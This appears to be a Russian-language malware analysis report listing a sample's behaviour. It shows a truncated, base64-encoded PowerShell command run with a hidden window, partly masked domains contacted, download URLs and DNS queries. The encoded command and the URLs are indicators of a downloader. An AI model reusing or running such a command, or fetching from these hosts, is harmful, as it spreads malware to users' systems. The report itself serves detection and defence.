Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAGkANgA2AHUAcAA1AD0AKAAnAEQAJwArACcAMQBmADcAMQBjAHgAJwApADsALgAoACcAbgBlACcAKwAnAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQARQBuAFYAOgBUAGUATQBwAFwAbwBGAEYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 3808
- 'pl###tbolt.com':443
- 'ru###friend.com':80
- 'ru###friend.com':443
- 'x1.#.lencr.org':80
- 'su##st.com':80
- 'su##st.com':443
- http://www.ru###friend.com/cgi-bin/B8o7V/
- http://x1.#.lencr.org/
- http://su##st.com/tv/6CyPKSX/
- 'pl###tbolt.com':443
- 'ru###friend.com':443
- 'su##st.com':443
- DNS ASK pl###tbolt.com
- DNS ASK re###relax.xyz
- DNS ASK su####stallion.com
- DNS ASK ru###friend.com
- DNS ASK x1.#.lencr.org
- DNS ASK sz####zlorhinos.hu
- DNS ASK su##st.com
- DNS ASK t-###inity.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAGkANgA2AHUAcAA1AD0AKAAnAEQAJwArACcAMQBmADcAMQBjAHgAJwApADsALgAoACcAbgBlACcAKwAnAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQARQBuAFYAOgBUAGUATQBwAFwAbwBGAEYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH... (со скрытым окном)